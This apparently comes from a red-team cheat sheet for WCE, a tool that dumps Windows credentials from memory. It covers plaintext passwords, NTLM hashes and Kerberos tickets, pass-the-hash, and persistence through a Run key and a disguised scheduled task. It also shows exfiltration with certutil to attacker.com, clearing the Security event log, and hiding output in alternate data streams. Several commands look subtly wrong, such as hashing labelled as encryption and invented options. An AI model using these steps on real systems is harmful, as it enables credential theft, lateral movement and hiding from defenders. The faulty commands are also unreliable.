WCE (Windows Credentials Editor)
Overview
Abschnitt betitelt „Overview“WCE (Windows Credentials Editor) is a specialized tool for extracting and manipulating Windows credentials from memory. It allows authorized security professionals to view plaintext passwords, NTLM hashes, and Kerberos tickets from running processes. WCE is used in authorized penetration testing, red team exercises, and security research on Windows systems.
Prerequisites
Abschnitt betitelt „Prerequisites“- Windows system with administrator privileges
- Understanding of Windows credential storage mechanisms
- Authorization to perform credential testing
Installation
Abschnitt betitelt „Installation“Direct Download
Abschnitt betitelt „Direct Download“Download the precompiled binary from the official release site:
# Download wce.exe
# SHA256: Verify checksum before execution
certutil -hashfile wce.exe SHA256Compilation (Optional)
Abschnitt betitelt „Compilation (Optional)“# For advanced users compiling from source
# Requires Windows development environment
# gcc or MSVC toolchain
gcc -o wce.exe wce.cFile Structure
Abschnitt betitelt „File Structure“wce/
├── wce.exe # Main executable (32-bit)
├── wce-universal.exe # Universal binary
├── README.txt
└── CHANGELOGBasic Commands
Abschnitt betitelt „Basic Commands“| Command | Description |
|---|---|
wce -l | List all credentials in memory |
wce -c | Display running processes with credentials |
wce -g | Get credentials from specific process |
wce -s | Start process and extract credentials |
wce -k | Extract Kerberos tickets |
wce -n | Extract NTLM hashes |
wce -w | Write credentials to file |
wce -h | Display help information |
Credential Extraction
Abschnitt betitelt „Credential Extraction“List All Credentials
Abschnitt betitelt „List All Credentials“# Extract all credentials from memory
wce -l
# Output example:
# User: DOMAIN\Administrator
# Password: P@ssw0rd123
# Hash: 8846f7eaee8fb117ad06bdd830b7586cExtract from Specific Process
Abschnitt betitelt „Extract from Specific Process“# Get credentials from a specific PID
wce -l -s ProcessName
# Get credentials from explorer.exe
wce -l -s explorer.exe
# Get credentials from svchost.exe
wce -l -s svchost.exeVerbose Output
Abschnitt betitelt „Verbose Output“# Detailed credential information
wce -l -v
# Shows:
# - Username
# - Domain
# - Plaintext password
# - NTLM hash
# - Process ID
# - Credential typeNTLM Hash Extraction
Abschnitt betitelt „NTLM Hash Extraction“Extract NTLM Hashes
Abschnitt betitelt „Extract NTLM Hashes“# Get all NTLM hashes from memory
wce -l -n
# Output format:
# username:domain:lmhash:ntmhash
# Administrator:WORKGROUP:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586cSave Hashes to File
Abschnitt betitelt „Save Hashes to File“# Export hashes for crack attempt
wce -l -n > hashes.txt
# Format for hashcat/john:
# username:uid:lmhash:ntmhash:::Identify Hash Types
Abschnitt betitelt „Identify Hash Types“# Determine which hashes are present
wce -l -n | findstr /v "aad3b435b51404eeaad3b435b51404ee"
# aad3b435b51404eeaad3b435b51404ee is empty LM hash indicatorKerberos Ticket Extraction
Abschnitt betitelt „Kerberos Ticket Extraction“Extract Kerberos Tickets
Abschnitt betitelt „Extract Kerberos Tickets“# List all Kerberos tickets in memory
wce -l -k
# Output shows:
# - Service ticket granting ticket (TGT)
# - Service tickets (ST)
# - Session keysExport Tickets for Pass-the-Ticket
Abschnitt betitelt „Export Tickets for Pass-the-Ticket“# Extract ticket in base64 format
wce -l -k -b > tickets.txt
# Import and use with ptk tools
# or Mimikatz pass-the-ticket functionalityProcess Monitoring
Abschnitt betitelt „Process Monitoring“Monitor Running Processes
Abschnitt betitelt „Monitor Running Processes“# List processes with cached credentials
wce -c
# Shows active processes with credential handles
# Useful for targeting services and system processesDump Credentials from Service Account
Abschnitt betitelt „Dump Credentials from Service Account“# Target specific service
wce -l -s "SQL Server (MSSQLSERVER)"
# Target IIS application pool
wce -l -s "w3wp.exe"
# Target backup service
wce -l -s "mbsvc.exe"Advanced Usage
Abschnitt betitelt „Advanced Usage“Silent Extraction Mode
Abschnitt betitelt „Silent Extraction Mode“# Extract without user feedback
wce -l -s ProcessName -w output.txt
# Redirect all output to file
# Useful for automated red team operationsFilter Credentials by Domain
Abschnitt betitelt „Filter Credentials by Domain“# Extract only domain credentials
wce -l | findstr "DOMAIN\"
# Extract local machine credentials
wce -l | findstr /v "DOMAIN"Continuous Monitoring
Abschnitt betitelt „Continuous Monitoring“# Monitor for new credentials over time
wce -l > credentials_snapshot.txt
# Wait and capture changes
timeout /t 300
wce -l > credentials_update.txt
# Compare snapshots
fc credentials_snapshot.txt credentials_update.txtIntegration with Other Tools
Abschnitt betitelt „Integration with Other Tools“Pass-the-Hash with WCE
Abschnitt betitelt „Pass-the-Hash with WCE“# Extract NTLM hash
wce -l -n > hashes.txt
# Use with PsExec pass-the-hash:
# psexec.exe -h \\targethost -u DOMAIN\user -p :ntmhash cmd.exeCredential Dumping Pipeline
Abschnitt betitelt „Credential Dumping Pipeline“# Extract and prepare for cracking
wce -l -n | sed 's/:.*$//' > usernames.txt
wce -l -n | sed 's/.*://' > hashes.txt
# Match for rainbow table lookup
# or GPU cracking with hashcatIntegration with Mimikatz
Abschnitt betitelt „Integration with Mimikatz“# WCE focuses on memory extraction
# Mimikatz handles encryption/logonsessions
# Complement with Mimikatz:
# mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"
# Compare results for complete credential auditSecure Credential Handling
Abschnitt betitelt „Secure Credential Handling“Encrypt Exported Credentials
Abschnitt betitelt „Encrypt Exported Credentials“# Export and encrypt immediately
wce -l > creds.txt
# Encrypt output
certutil -hashfile creds.txt SHA256
# Delete original
del /secure creds.txtLog Credential Access
Abschnitt betitelt „Log Credential Access“# Create audit trail
echo [%date% %time%] WCE executed by %username% >> audit.log
wce -l >> audit.log
# Encrypt audit log
cipher /e /s:%cd% audit.logDetection and Evasion
Abschnitt betitelt „Detection and Evasion“Stealth Extraction
Abschnitt betitelt „Stealth Extraction“# Run from temporary location
cd %temp%
wce.exe -l > output.txt
# Use alternate data streams (Windows)
wce.exe -l > output.txt:hidden
# Clean temporary artifacts
del output.txtTiming Considerations
Abschnitt betitelt „Timing Considerations“# Extract during user logon/logoff
# When credentials are most likely in memory
# Target peak hours for service credentials
# Avoid antivirus scan windowsTroubleshooting
Abschnitt betitelt „Troubleshooting“No Credentials Found
Abschnitt betitelt „No Credentials Found“# Issue: No credentials displayed
# Solution 1: Verify admin privileges
whoami /priv | findstr SeDebugPrivilege
# Solution 2: Check for 64-bit vs 32-bit mismatch
wce.exe -l # 32-bit
# Try 64-bit version for x64 systemsAccess Denied Error
Abschnitt betitelt „Access Denied Error“# Issue: "Access Denied" when running WCE
# Solution: Run as Administrator
# Method 1: Right-click Run as Administrator
# Method 2: From admin command prompt
wce.exe -l
# Method 3: Schedule as SYSTEM
schtasks /create /tn "CredDump" /tr "wce.exe -l" /sc once /st 12:00Missing Credentials
Abschnitt betitelt „Missing Credentials“# Issue: Expected credentials not shown
# Possible causes:
# 1. Credentials cleared from memory
# 2. User not logged in
# 3. Process permissions restrict access
# Solution: Check active sessions
wce -c
# Wait for user to interact with system
# Credentials cached when passwords enteredOperational Security
Abschnitt betitelt „Operational Security“OPSEC Best Practices
Abschnitt betitelt „OPSEC Best Practices“# 1. Use temporary filenames
set /p filename=<nul
wce.exe -l > %random%.txt
# 2. Compress and encrypt output
wce.exe -l | gzip > creds.gz
# Transfer via encrypted channel
# 3. Delete WCE and artifacts
del wce.exe
del %random%.txtDetection Mitigation
Abschnitt betitelt „Detection Mitigation“# 1. Disable Windows Update notifications
# 2. Clear event logs
wevtutil cl Security
# 3. Remove command history
history -c
# 4. Close all logging
# Disable PowerShell logging
powershell -NoProfile -Command "Disable-PSLogging"Practical Examples
Abschnitt betitelt „Practical Examples“Red Team Credential Harvesting
Abschnitt betitelt „Red Team Credential Harvesting“# Establish persistence
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "Cred" /d "C:\Windows\Temp\wce.exe -l > C:\Windows\Temp\log.txt"
# Create scheduled task for periodic dumps
schtasks /create /tn "System Maintenance" /tr "C:\Windows\Temp\wce.exe -l >> C:\Windows\Temp\log.txt" /sc hourly
# Exfiltrate credentials
certutil -urlcache -f "http://attacker.com/upload.php?data=" log.txtPrivilege Escalation Chain
Abschnitt betitelt „Privilege Escalation Chain“# 1. Get current user credentials
wce -l -s explorer.exe
# 2. Extract service account credentials
wce -l -s svchost.exe
# 3. Use extracted credentials for lateral movement
# psexec -u DOMAIN\serviceaccount -p password \\target cmd.exeCredential Audit
Abschnitt betitelt „Credential Audit“# Comprehensive audit script
@echo off
echo [*] WCE Credential Audit - %date% %time%
wce -l -v >> audit_report.txt
echo.
echo [*] NTLM Hashes:
wce -l -n >> audit_report.txt
echo.
echo [*] Kerberos Tickets:
wce -l -k >> audit_report.txt
echo Audit complete - results in audit_report.txtComparison with Similar Tools
Abschnitt betitelt „Comparison with Similar Tools“| Tool | Purpose | Focus |
|---|---|---|
| WCE | Plaintext password extraction | Windows credentials in memory |
| Mimikatz | Complete Windows security analysis | Encryption, logon sessions |
| ProcDump | Memory dump utility | Generic process memory |
| PowerSploit | PowerShell exploitation framework | Full Windows exploitation |
| Responder | LLMNR/NBNS poisoning | Network credential capture |
Limitations
Abschnitt betitelt „Limitations“- Requires admin privileges
- Plaintext passwords limited to cached/active sessions
- Works primarily on Windows systems
- Modern credential guard may limit effectiveness
- Service account passwords vary by running context
Related Tools
Abschnitt betitelt „Related Tools“- Mimikatz: More comprehensive Windows exploitation
- Responder: Network-based credential capture
- LaZagne: Cross-platform credential recovery
- CrackMapExec: Lateral movement and credential testing
References
Abschnitt betitelt „References“- Windows Credentials Editor Repository
- NTLM Hash Specification Microsoft Docs
- Kerberos Authentication RFC 4120
- Credential Guard Microsoft Security Blog
Legal Notice
Abschnitt betitelt „Legal Notice“WCE is designed for authorized security testing, red team exercises, and defensive research. Unauthorized access to computer systems is illegal. Only use on systems you own or have explicit written permission to test.